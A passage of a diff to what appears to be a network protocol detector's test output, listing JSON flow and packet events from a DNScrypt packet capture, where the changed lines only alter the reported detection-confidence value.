AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":368,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318169} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":368,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuocAub0RBHUKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuokgAL0R358KAAABwb+7a9PHAbsGBMWnLywBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuoggAL0R36AKAAABwb+7a7+QAbsGBNniLygBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":371,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318169} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":371,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuokAub0RBHMKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":372,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318169} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":372,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuogAub0RBHQKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAIcuopAAL0Rw14KAAABwb+7a7\/bAbsCCEABLykBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":946739318170,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318170,"pkt":"ZmZmZmZmRERERERECABFAADWEfMAADQRWDSOBM0vCgAAAQG7nMoAwrdpqlqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":946739318171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318171,"pkt":"ZmZmZmZmRERERERECABFAADWEfIAADQRWDWOBM0vCgAAAQG701AAwoDiqluBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":946739318175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318175,"pkt":"ZmZmZmZmRERERERECABFAADWEfQAADQRWDOOBM0vCgAAAQG7jD8Awsf2qliBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} @@ -763,55 +763,55 @@ 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":946739318205,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739318205,"pkt":"ZmZmZmZmRERERERECABFAADSHklAADYR5+rBv7trCgAAAQG7v5AAvjUmLyiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAzGGkyIiowp8pFszsXxkEW0y0qS06At4miIE7AyLIdZ2u5Jf0Kd+gqa\/ZnKsGDqB9\/JqMQzB5mxntdDH0TQRsCBpBtMbo6VmIyWnkxOdJSeZWPK9K\/gWr4WDPFo1HWxdqGkG0xujpWYgAAAABX1Oe6F9U8Gg="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+LxAAL0RUngKAAABMw980LE\/EPcCCHK1aUUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": 